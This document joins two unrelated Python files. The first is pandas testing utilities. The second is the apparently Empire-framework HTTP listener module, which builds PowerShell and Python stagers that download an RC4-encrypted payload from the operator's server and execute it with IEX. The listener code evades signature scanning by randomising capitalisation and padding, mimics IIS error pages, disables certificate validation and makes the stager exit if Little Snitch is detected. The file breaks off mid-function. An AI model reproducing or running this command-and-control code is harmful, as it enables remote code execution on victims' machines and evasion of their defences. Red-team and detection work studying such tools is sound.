r_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and r_idx_nlevels == 1
)
assert c_idx_type is None or (
c_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and c_idx_nlevels == 1
)
columns = makeCustomIndex(
ncols,
nlevels=c_idx_nlevels,
prefix="C",
names=c_idx_names,
ndupe_l=c_ndupe_l,
idx_type=c_idx_type,
)
index = makeCustomIndex(
nrows,
nlevels=r_idx_nlevels,
prefix="R",
names=r_idx_names,
ndupe_l=r_ndupe_l,
idx_type=r_idx_type,
)
# by default, generate data based on location
if data_gen_f is None:
data_gen_f = lambda r, c: f"R{r}C{c}"
data = [[data_gen_f(r, c) for c in range(ncols)] for r in range(nrows)]
return DataFrame(data, index, columns, dtype=dtype)
def _create_missing_idx(nrows, ncols, density, random_state=None):
if random_state is None:
random_state = np.random
else:
random_state = np.random.RandomState(random_state)
# below is cribbed from scipy.sparse
size = int(np.round((1 - density) * nrows * ncols))
# generate a few more to ensure unique values
min_rows = 5
fac = 1.02
extra_size = min(size + min_rows, fac * size)
def _gen_unique_rand(rng, _extra_size):
ind = rng.rand(int(_extra_size))
return np.unique(np.floor(ind * nrows * ncols))[:size]
ind = _gen_unique_rand(random_state, extra_size)
while ind.size < size:
extra_size *= 1.05
ind = _gen_unique_rand(random_state, extra_size)
j = np.floor(ind * 1.0 / nrows).astype(int)
i = (ind - j * nrows).astype(int)
return i.tolist(), j.tolist()
def makeMissingDataframe(density=0.9, random_state=None):
df = makeDataFrame()
# pandas\_testing.py:2306: error: "_create_missing_idx" gets multiple
# values for keyword argument "density" [misc]
# pandas\_testing.py:2306: error: "_create_missing_idx" gets multiple
# values for keyword argument "random_state" [misc]
i, j = _create_missing_idx( # type: ignore[misc]
*df.shape, density=density, random_state=random_state
)
df.values[i, j] = np.nan
return df
def optional_args(decorator):
"""
allows a decorator to take optional positional and keyword arguments.
Assumes that taking a single, callable, positional argument means that
it is decorating a function, i.e. something like this::
@my_decorator
def function(): pass
Calls decorator with decorator(f, *args, **kwargs)
"""
@wraps(decorator)
def wrapper(*args, **kwargs):
def dec(f):
return decorator(f, *args, **kwargs)
is_decorating = not kwargs and len(args) == 1 and callable(args[0])
if is_decorating:
f = args[0]
# pandas\_testing.py:2331: error: Incompatible types in assignment
# (expression has type "List[<nothing>]", variable has type
# "Tuple[Any, ...]")
args = [] # type: ignore[assignment]
return dec(f)
else:
return dec
return wrapper
# skip tests on exceptions with this message
_network_error_messages = (
# 'urlopen error timed out',
# 'timeout: timed out',
# 'socket.timeout: timed out',
"timed out",
"Server Hangup",
"HTTP Error 503: Service Unavailable",
"502: Proxy Error",
"HTTP Error 502: internal error",
"HTTP Error 502",
"HTTP Error 503",
"HTTP Error 403",
"HTTP Error 400",
"Temporary failure in name resolution",
"Name or service not known",
"Connection refused",
"certificate verify",
)
# or this e.errno/e.reason.errno
_network_errno_vals = (
101, # Network is unreachable
111, # Connection refused
110, # Connection timed out
104, # Connection reset Error
54, # Connection reset by peer
60, # urllib.error.URLError: [Errno 60] Connection timed out
)
# Both of the above shouldn't mask real issues such as 404's
# or refused connections (changed DNS).
# But some tests (test_data yahoo) contact incredibly flakey
# servers.
# and conditionally raise on exception types in _get_default_network_errors
def _get_default_network_errors():
# Lazy import for http.client because it imports many things from the stdlib
import http.client
return (IOError, http.client.HTTPException, TimeoutError)
def can_connect(url, error_classes=None):
"""
Try to connect to the given url. True if succeeds, False if IOError
raised
Parameters
----------
url : basestring
The URL to try to connect to
Returns
-------
connectable : bool
Return True if no IOError (unable to connect) or URLError (bad url) was
raised
"""
if error_classes is None:
error_classes = _get_default_network_errors()
try:
with urlopen(url):
pass
except error_classes:
return False
else:
return True
@optional_args
def network(
t,
url="https://www.google.com",
raise_on_error=_RAISE_NETWORK_ERROR_DEFAULT,
check_before_test=False,
error_classes=None,
skip_errnos=_network_errno_vals,
_skip_on_messages=_network_error_messages,
):
"""
Label a test as requiring network connection and, if an error is
encountered, only raise if it does not find a network connection.
In comparison to ``network``, this assumes an added contract to your test:
you must assert that, under normal conditions, your test will ONLY fail if
it does not have network connectivity.
You can call this in 3 ways: as a standard decorator, with keyword
arguments, or with a positional argument that is the url to check.
Parameters
----------
t : callable
The test requiring network connectivity.
url : path
The url to test via ``pandas.io.common.urlopen`` to check
for connectivity. Defaults to 'https://www.google.com'.
raise_on_error : bool
If True, never catches errors.
check_before_test : bool
If True, checks connectivity before running the test case.
error_classes : tuple or Exception
error classes to ignore. If not in ``error_classes``, raises the error.
defaults to IOError. Be careful about changing the error classes here.
skip_errnos : iterable of int
Any exception that has .errno or .reason.erno set to one
of these values will be skipped with an appropriate
message.
_skip_on_messages: iterable of string
any exception e for which one of the strings is
a substring of str(e) will be skipped with an appropriate
message. Intended to suppress errors where an errno isn't available.
Notes
-----
* ``raise_on_error`` supersedes ``check_before_test``
Returns
-------
t : callable
The decorated test ``t``, with checks for connectivity errors.
Example
-------
Tests decorated with @network will fail if it's possible to make a network
connection to another URL (defaults to google.com)::
>>> from pandas._testing import network
>>> from pandas.io.common import urlopen
>>> @network
... def test_network():
... with urlopen("rabbit://bonanza.com"):
... pass
Traceback
...
URLError: <urlopen error unknown url type: rabit>
You can specify alternative URLs::
>>> @network("https://www.yahoo.com")
... def test_something_with_yahoo():
... raise IOError("Failure Message")
>>> test_something_with_yahoo()
Traceback (most recent call last):
...
IOError: Failure Message
If you set check_before_test, it will check the url first and not run the
test on failure::
>>> @network("failing://url.blaher", check_before_test=True)
... def test_something():
... print("I ran!")
... raise ValueError("Failure")
>>> test_something()
Traceback (most recent call last):
...
Errors not related to networking will always be raised.
"""
from pytest import skip
if error_classes is None:
error_classes = _get_default_network_errors()
t.network = True
@wraps(t)
def wrapper(*args, **kwargs):
if (
check_before_test
and not raise_on_error
and not can_connect(url, error_classes)
):
skip()
try:
return t(*args, **kwargs)
except Exception as err:
errno = getattr(err, "errno", None)
if not errno and hasattr(errno, "reason"):
# pandas\_testing.py:2521: error: "Exception" has no attribute
# "reason"
errno = getattr(err.reason, "errno", None) # type: ignore[attr-defined]
if errno in skip_errnos:
skip(f"Skipping test due to known errno and error {err}")
e_str = str(err)
if any(m.lower() in e_str.lower() for m in _skip_on_messages):
skip(
f"Skipping test because exception message is known and error {err}"
)
if not isinstance(err, error_classes):
raise
if raise_on_error or can_connect(url, error_classes):
raise
else:
skip(f"Skipping test due to lack of connectivity and error {err}")
return wrapper
with_connectivity_check = network
@contextmanager
def assert_produces_warning(
expected_warning: Optional[Union[Type[Warning], bool]] = Warning,
filter_level="always",
check_stacklevel: bool = True,
raise_on_extra_warnings: bool = True,
match: Optional[str] = None,
):
"""
Context manager for running code expected to either raise a specific
warning, or not raise any warnings. Verifies that the code raises the
expected warning, and that it does not raise any other unexpected
warnings. It is basically a wrapper around ``warnings.catch_warnings``.
Parameters
----------
expected_warning : {Warning, False, None}, default Warning
The type of Exception raised. ``exception.Warning`` is the base
class for all warnings. To check that no warning is returned,
specify ``False`` or ``None``.
filter_level : str or None, default "always"
Specifies whether warnings are ignored, displayed, or turned
into errors.
Valid values are:
* "error" - turns matching warnings into exceptions
* "ignore" - discard the warning
* "always" - always emit a warning
* "default" - print the warning the first time it is generated
from each location
* "module" - print the warning the first time it is generated
from each module
* "once" - print the warning the first time it is generated
check_stacklevel : bool, default True
If True, displays the line that called the function containing
the warning to show were the function is called. Otherwise, the
line that implements the function is displayed.
raise_on_extra_warnings : bool, default True
Whether extra warnings not of the type `expected_warning` should
cause the test to fail.
match : str, optional
Match warning message.
Examples
--------
>>> import warnings
>>> with assert_produces_warning():
... warnings.warn(UserWarning())
...
>>> with assert_produces_warning(False):
... warnings.warn(RuntimeWarning())
...
Traceback (most recent call last):
...
AssertionError: Caused unexpected warning(s): ['RuntimeWarning'].
>>> with assert_produces_warning(UserWarning):
... warnings.warn(RuntimeWarning())
Traceback (most recent call last):
...
AssertionError: Did not see expected warning of class 'UserWarning'.
..warn:: This is *not* thread-safe.
"""
__tracebackhide__ = True
with warnings.catch_warnings(record=True) as w:
saw_warning = False
matched_message = False
warnings.simplefilter(filter_level)
yield w
extra_warnings = []
for actual_warning in w:
if not expected_warning:
continue
expected_warning = cast(Type[Warning], expected_warning)
if issubclass(actual_warning.category, expected_warning):
saw_warning = True
if check_stacklevel and issubclass(
actual_warning.category, (FutureWarning, DeprecationWarning)
):
_assert_raised_with_correct_stacklevel(actual_warning)
if match is not None and re.search(match, str(actual_warning.message)):
matched_message = True
else:
extra_warnings.append(
(
actual_warning.category.__name__,
actual_warning.message,
actual_warning.filename,
actual_warning.lineno,
)
)
if expected_warning:
expected_warning = cast(Type[Warning], expected_warning)
if not saw_warning:
raise AssertionError(
f"Did not see expected warning of class "
f"{repr(expected_warning.__name__)}"
)
if match and not matched_message:
raise AssertionError(
f"Did not see warning {repr(expected_warning.__name__)} "
f"matching {match}"
)
if raise_on_extra_warnings and extra_warnings:
raise AssertionError(
f"Caused unexpected warning(s): {repr(extra_warnings)}"
)
def _assert_raised_with_correct_stacklevel(
actual_warning: warnings.WarningMessage,
) -> None:
from inspect import getframeinfo, stack
caller = getframeinfo(stack()[3][0])
msg = (
"Warning not set with correct stacklevel. "
f"File where warning is raised: {actual_warning.filename} != "
f"{caller.filename}. Warning message: {actual_warning.message}"
)
assert actual_warning.filename == caller.filename, msg
class RNGContext:
"""
Context manager to set the numpy random number generator speed. Returns
to the original value upon exiting the context manager.
Parameters
----------
seed : int
Seed for numpy.random.seed
Examples
--------
with RNGContext(42):
np.random.randn()
"""
def __init__(self, seed):
self.seed = seed
def __enter__(self):
self.start_state = np.random.get_state()
np.random.seed(self.seed)
def __exit__(self, exc_type, exc_value, traceback):
np.random.set_state(self.start_state)
@contextmanager
def with_csv_dialect(name, **kwargs):
"""
Context manager to temporarily register a CSV dialect for parsing CSV.
Parameters
----------
name : str
The name of the dialect.
kwargs : mapping
The parameters for the dialect.
Raises
------
ValueError : the name of the dialect conflicts with a builtin one.
See Also
--------
csv : Python's CSV library.
"""
import csv
_BUILTIN_DIALECTS = {"excel", "excel-tab", "unix"}
if name in _BUILTIN_DIALECTS:
raise ValueError("Cannot override builtin dialect.")
csv.register_dialect(name, **kwargs)
yield
csv.unregister_dialect(name)
@contextmanager
def use_numexpr(use, min_elements=None):
from pandas.core.computation import expressions as expr
if min_elements is None:
min_elements = expr._MIN_ELEMENTS
olduse = expr.USE_NUMEXPR
oldmin = expr._MIN_ELEMENTS
expr.set_use_numexpr(use)
expr._MIN_ELEMENTS = min_elements
yield
expr._MIN_ELEMENTS = oldmin
expr.set_use_numexpr(olduse)
def test_parallel(num_threads=2, kwargs_list=None):
"""
Decorator to run the same function multiple times in parallel.
Parameters
----------
num_threads : int, optional
The number of times the function is run in parallel.
kwargs_list : list of dicts, optional
The list of kwargs to update original
function kwargs on different threads.
Notes
-----
This decorator does not pass the return value of the decorated function.
Original from scikit-image:
https://github.com/scikit-image/scikit-image/pull/1519
"""
assert num_threads > 0
has_kwargs_list = kwargs_list is not None
if has_kwargs_list:
assert len(kwargs_list) == num_threads
import threading
def wrapper(func):
@wraps(func)
def inner(*args, **kwargs):
if has_kwargs_list:
update_kwargs = lambda i: dict(kwargs, **kwargs_list[i])
else:
update_kwargs = lambda i: kwargs
threads = []
for i in range(num_threads):
updated_kwargs = update_kwargs(i)
thread = threading.Thread(target=func, args=args, kwargs=updated_kwargs)
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return inner
return wrapper
class SubclassedSeries(Series):
_metadata = ["testattr", "name"]
@property
def _constructor(self):
return SubclassedSeries
@property
def _constructor_expanddim(self):
return SubclassedDataFrame
class SubclassedDataFrame(DataFrame):
_metadata = ["testattr"]
@property
def _constructor(self):
return SubclassedDataFrame
@property
def _constructor_sliced(self):
return SubclassedSeries
class SubclassedCategorical(Categorical):
@property
def _constructor(self):
return SubclassedCategorical
@contextmanager
def set_timezone(tz: str):
"""
Context manager for temporarily setting a timezone.
Parameters
----------
tz : str
A string representing a valid timezone.
Examples
--------
>>> from datetime import datetime
>>> from dateutil.tz import tzlocal
>>> tzlocal().tzname(datetime.now())
'IST'
>>> with set_timezone('US/Eastern'):
... tzlocal().tzname(datetime.now())
...
'EDT'
"""
import os
import time
def setTZ(tz):
if tz is None:
try:
del os.environ["TZ"]
except KeyError:
pass
else:
os.environ["TZ"] = tz
time.tzset()
orig_tz = os.environ.get("TZ")
setTZ(tz)
try:
yield
finally:
setTZ(orig_tz)
def _make_skipna_wrapper(alternative, skipna_alternative=None):
"""
Create a function for calling on an array.
Parameters
----------
alternative : function
The function to be called on the array with no NaNs.
Only used when 'skipna_alternative' is None.
skipna_alternative : function
The function to be called on the original array
Returns
-------
function
"""
if skipna_alternative:
def skipna_wrapper(x):
return skipna_alternative(x.values)
else:
def skipna_wrapper(x):
nona = x.dropna()
if len(nona) == 0:
return np.nan
return alternative(nona)
return skipna_wrapper
def convert_rows_list_to_csv_str(rows_list: List[str]):
"""
Convert list of CSV rows to single CSV-formatted string for current OS.
This method is used for creating expected value of to_csv() method.
Parameters
----------
rows_list : List[str]
Each element represents the row of csv.
Returns
-------
str
Expected output of to_csv() in current OS.
"""
sep = os.linesep
return sep.join(rows_list) + sep
def external_error_raised(expected_exception: Type[Exception]) -> ContextManager:
"""
Helper function to mark pytest.raises that have an external error message.
Parameters
----------
expected_exception : Exception
Expected error to raise.
Returns
-------
Callable
Regular `pytest.raises` function with `match` equal to `None`.
"""
import pytest
return pytest.raises(expected_exception, match=None)
cython_table = pd.core.base.SelectionMixin._cython_table.items()
def get_cython_table_params(ndframe, func_names_and_expected):
"""
Combine frame, functions from SelectionMixin._cython_table
keys and expected result.
Parameters
----------
ndframe : DataFrame or Series
func_names_and_expected : Sequence of two items
The first item is a name of a NDFrame method ('sum', 'prod') etc.
The second item is the expected return value.
Returns
-------
list
List of three items (DataFrame, function, expected result)
"""
results = []
for func_name, expected in func_names_and_expected:
results.append((ndframe, func_name, expected))
results += [
(ndframe, func, expected)
for func, name in cython_table
if name == func_name
]
return results
def get_op_from_name(op_name: str) -> Callable:
"""
The operator function for a given op name.
Parameters
----------
op_name : string
The op name, in form of "add" or "__add__".
Returns
-------
function
A function performing the operation.
"""
short_opname = op_name.strip("_")
try:
op = getattr(operator, short_opname)
except AttributeError:
# Assume it is the reverse operator
rop = getattr(operator, short_opname[1:])
op = lambda x, y: rop(y, x)
return op
|
http.py
|
from __future__ import print_function
import base64
import copy
import json
import logging
import os
import random
import ssl
import string
import sys
import time
from builtins import object
from builtins import str
from typing import List
from flask import Flask, request, make_response, send_from_directory
from pydispatch import dispatcher
from werkzeug.serving import WSGIRequestHandler
from empire.server.common import encryption
from empire.server.common import helpers
from empire.server.common import packets
from empire.server.common import templating
from empire.server.utils import data_util
from empire.server.database.base import Session
from empire.server.database import models
class Listener(object):
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'HTTP[S]',
'Author': ['@harmj0y'],
'Description': ('Starts a http[s] listener (PowerShell or Python) that uses a GET/POST approach.'),
'Category': ('client_server'),
'Comments': []
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Name': {
'Description': 'Name for the listener.',
'Required': True,
'Value': 'http'
},
'Host': {
'Description': 'Hostname/IP for staging.',
'Required': True,
'Value': "http://%s" % (helpers.lhost())
},
'BindIP': {
'Description': 'The IP to bind to on the control server.',
'Required': True,
'Value': '0.0.0.0',
'SuggestedValues': ['0.0.0.0'],
'Strict': False
},
'Port': {
'Description': 'Port for the listener.',
'Required': True,
'Value': '',
'SuggestedValues': ['1335', '1336']
},
'Launcher': {
'Description': 'Launcher string.',
'Required': True,
'Value': 'powershell -noP -sta -w 1 -enc '
},
'StagingKey': {
'Description': 'Staging key for initial agent negotiation.',
'Required': True,
'Value': '2c103f2c4ed1e59c0b4e2e01821770fa'
},
'DefaultDelay': {
'Description': 'Agent delay/reach back interval (in seconds).',
'Required': True,
'Value': 5
},
'DefaultJitter': {
'Description': 'Jitter in agent reachback interval (0.0-1.0).',
'Required': True,
'Value': 0.0
},
'DefaultLostLimit': {
'Description': 'Number of missed checkins before exiting',
'Required': True,
'Value': 60
},
'DefaultProfile': {
'Description': 'Default communication profile for the agent.',
'Required': True,
'Value': "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
},
'CertPath': {
'Description': 'Certificate path for https listeners.',
'Required': False,
'Value': ''
},
'KillDate': {
'Description': 'Date for the listener to exit (MM/dd/yyyy).',
'Required': False,
'Value': ''
},
'WorkingHours': {
'Description': 'Hours for the agent to operate (09:00-17:00).',
'Required': False,
'Value': ''
},
'Headers': {
'Description': 'Headers for the control server.',
'Required': True,
'Value': 'Server:Microsoft-IIS/7.5'
},
'Cookie': {
'Description': 'Custom Cookie Name',
'Required': False,
'Value': ''
},
'StagerURI': {
'Description': 'URI for the stager. Must use /download/. Example: /download/stager.php',
'Required': False,
'Value': ''
},
'UserAgent': {
'Description': 'User-agent string to use for the staging request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'Proxy': {
'Description': 'Proxy to use for request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'ProxyCreds': {
'Description': 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'SlackURL': {
'Description': 'Your Slack Incoming Webhook URL to communicate with your Slack instance.',
'Required': False,
'Value': ''
}
}
# required:
self.mainMenu = mainMenu
self.threads = {}
# optional/specific for this module
self.app = None
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
# set the default staging key to the controller db default
self.options['StagingKey']['Value'] = str(data_util.get_config('staging_key')[0])
# randomize the length of the default_response and index_page headers to evade signature based scans
self.header_offset = random.randint(0, 64)
self.session_cookie = ''
# check if the current session cookie not empty and then generate random cookie
if self.session_cookie == '':
self.options['Cookie']['Value'] = self.generate_cookie()
def default_response(self):
"""
Returns an IIS 7.5 404 not found page.
"""
return '\r\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>',
'<title>404 - File or directory not found.</title>',
'<style type="text/css">',
'<!--',
'body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}',
'fieldset{padding:0 15px 10px 15px;} ',
'h1{font-size:2.4em;margin:0;color:#FFF;}',
'h2{font-size:1.7em;margin:0;color:#CC0000;} ',
'h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ',
'#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;',
'background-color:#555555;}',
'#content{margin:0 0 0 2%;position:relative;}',
'.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="header"><h1>Server Error</h1></div>',
'<div id="content">',
' <div class="content-container"><fieldset>',
' <h2>404 - File or directory not found.</h2>',
' <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>',
' </fieldset></div>',
'</div>',
'</body>',
'</html>',
' ' * self.header_offset, # randomize the length of the header to evade signature based detection
])
def method_not_allowed_page(self):
"""
Imitates IIS 7.5 405 "method not allowed" page.
"""
return '\r\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>',
'<title>405 - HTTP verb used to access this page is not allowed.</title>',
'<style type="text/css">',
'<!--',
'body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}',
'fieldset{padding:0 15px 10px 15px;} ',
'h1{font-size:2.4em;margin:0;color:#FFF;}',
'h2{font-size:1.7em;margin:0;color:#CC0000;} ',
'h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ',
'#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;',
'background-color:#555555;}',
'#content{margin:0 0 0 2%;position:relative;}',
'.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="header"><h1>Server Error</h1></div>',
'<div id="content">',
' <div class="content-container"><fieldset>',
' <h2>405 - HTTP verb used to access this page is not allowed.</h2>',
' <h3>The page you are looking for cannot be displayed because an invalid method (HTTP verb) was used to attempt access.</h3>',
' </fieldset></div>',
'</div>',
'</body>',
'</html>\r\n'
])
def index_page(self):
"""
Returns a default HTTP server page.
"""
return '\r\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />',
'<title>IIS7</title>',
'<style type="text/css">',
'<!--',
'body {',
' color:#000000;',
' background-color:#B3B3B3;',
' margin:0;',
'}',
'',
'#container {',
' margin-left:auto;',
' margin-right:auto;',
' text-align:center;',
' }',
'',
'a img {',
' border:none;',
'}',
'',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="container">',
'<a href="http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409"><img src="welcome.png" alt="IIS7" width="571" height="411" /></a>',
'</div>',
'</body>',
'</html>',
])
def validate_options(self):
"""
Validate all options for this listener.
"""
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
for key in self.options:
if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''):
print(helpers.color("[!] Option \"%s\" is required." % (key)))
return False
# If we've selected an HTTPS listener without specifying CertPath, let us know.
if self.options['Host']['Value'].startswith('https') and self.options['CertPath']['Value'] == '':
print(helpers.color("[!] HTTPS selected but no CertPath specified."))
return False
return True
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default',
proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='',
listenerName=None, bypasses:List[str]=None):
"""
Generate a basic launcher for the specified listener.
"""
bypasses = [] if bypasses is None else bypasses
if not language:
print(helpers.color('[!] listeners/http generate_launcher(): no language specified!'))
if listenerName and (listenerName in self.threads) and (
listenerName in self.mainMenu.listeners.activeListeners):
# extract the set options for this instantiated listener
listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options']
host = listenerOptions['Host']['Value']
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
profile = listenerOptions['DefaultProfile']['Value']
uris = [a for a in profile.split('|')[0].split(',')]
stage0 = random.choice(uris)
customHeaders = profile.split('|')[2:]
cookie = listenerOptions['Cookie']['Value']
# generate new cookie if the current session cookie is empty to avoid empty cookie if create multiple listeners
if cookie == '':
generate = self.generate_cookie()
listenerOptions['Cookie']['Value'] = generate
cookie = generate
if language.startswith('po'):
# PowerShell
stager = '$ErrorActionPreference = \"SilentlyContinue\";'
if safeChecks.lower() == 'true':
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass
for bypass in bypasses:
stager += bypass
if safeChecks.lower() == 'true':
stager += "};"
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + "=New-Object System.Net.WebClient;")
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
stager += "$u='" + userAgent + "';"
if 'https' in host:
# allow for self-signed certificates for https connections
stager += "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
stager += "$ser=" + helpers.obfuscate_call_home_address(host) + ";$t='" + stage0 + "';"
if userAgent.lower() != 'none':
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + '.Headers.Add(')
stager += "'User-Agent',$u);"
if proxy.lower() != 'none':
if proxy.lower() == 'default':
stager += helpers.randomize_capitalization("$" + helpers.generate_random_script_var_name(
"wc") + ".Proxy=[System.Net.WebRequest]::DefaultWebProxy;")
else:
# TODO: implement form for other proxy
stager += helpers.randomize_capitalization("$proxy=New-Object Net.WebProxy('")
stager += proxy.lower()
stager += helpers.randomize_capitalization("');")
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + ".Proxy = $proxy;")
if proxyCreds.lower() != 'none':
if proxyCreds.lower() == "default":
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name(
"wc") + ".Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;")
else:
# TODO: implement form for other proxy credentials
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
if len(username.split('\\')) > 1:
usr = username.split('\\')[1]
domain = username.split('\\')[0]
stager += "$netcred = New-Object System.Net.NetworkCredential('" + usr + "','" + password + "','" + domain + "');"
else:
usr = username.split('\\')[0]
stager += "$netcred = New-Object System.Net.NetworkCredential('" + usr + "','" + password + "');"
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name(
"wc") + ".Proxy.Credentials = $netcred;")
# save the proxy settings to use during the entire staging process and the agent
stager += "$Script:Proxy = $" + helpers.generate_random_script_var_name("wc") + ".Proxy;"
# TODO: reimplement stager retries?
# check if we're using IPv6
listenerOptions = copy.deepcopy(listenerOptions)
bindIP = listenerOptions['BindIP']['Value']
port = listenerOptions['Port']['Value']
if ':' in bindIP:
if "http" in host:
if "https" in host:
host = 'https://' + '[' + str(bindIP) + ']' + ":" + str(port)
else:
host = 'http://' + '[' + str(bindIP) + ']' + ":" + str(port)
# code to turn the key string into a byte array
stager += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(")
stager += "'%s');" % (stagingKey)
# this is the minimized RC4 stager code from rc4.ps1
stager += helpers.randomize_capitalization('$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};')
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL',
meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
# Add custom headers if any
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
# If host header defined, assume domain fronting is in use and add a call to the base URL first
# this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
if headerKey.lower() == "host":
stager += helpers.randomize_capitalization(
"try{$ig=$" + helpers.generate_random_script_var_name(
"wc") + ".DownloadData($ser)}catch{};")
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + ".Headers.Add(")
stager += "\"%s\",\"%s\");" % (headerKey, headerValue)
# add the RC4 packet to a cookie
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + ".Headers.Add(")
stager += "\"Cookie\",\"%s=%s\");" % (cookie, b64RoutingPacket.decode('UTF-8'))
stager += helpers.randomize_capitalization(
"$data=$" + helpers.generate_random_script_var_name("wc") + ".DownloadData($ser+$t);")
stager += helpers.randomize_capitalization("$iv=$data[0..3];$data=$data[4..$data.length];")
# decode everything and kick it over to IEX to kick off execution
stager += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX")
if obfuscate:
stager = helpers.obfuscate(self.mainMenu.installPath, stager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())):
return helpers.powershell_launcher(stager, launcher)
else:
# otherwise return the case-randomized stager
return stager
if language.startswith('py'):
# Python
launcherBase = 'import sys;'
if "https" in host:
# monkey patch ssl woohooo
launcherBase += "import ssl;\nif hasattr(ssl, '_create_unverified_context'):ssl._create_default_https_context = ssl._create_unverified_context;\n"
try:
if safeChecks.lower() == 'true':
launcherBase += "import re, subprocess;"
launcherBase += "cmd = \"ps -ef | grep Little\ Snitch | grep -v grep\"\n"
launcherBase += "ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n"
launcherBase += "out, err = ps.communicate()\n"
launcherBase += "if re.search(\"Little Snitch\", out.decode('UTF-8')):\n"
launcherBase += " sys.exit()\n"
except Exception as e:
p = "[!] Error setting LittleSnitch in stager: " + str(e)
print(helpers.color(p, color='red'))
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
launcherBase += "import urllib.request;\n"
launcherBase += "UA='%s';" % (userAgent)
launcherBase += "server='%s';t='%s';" % (host, stage0)
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='PYTHON',
meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket).decode('UTF-8')
launcherBase += "req=urllib.request.Request(server+t);\n"
# Add custom headers if any
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
# launcherBase += ",\"%s\":\"%s\"" % (headerKey, headerValue)
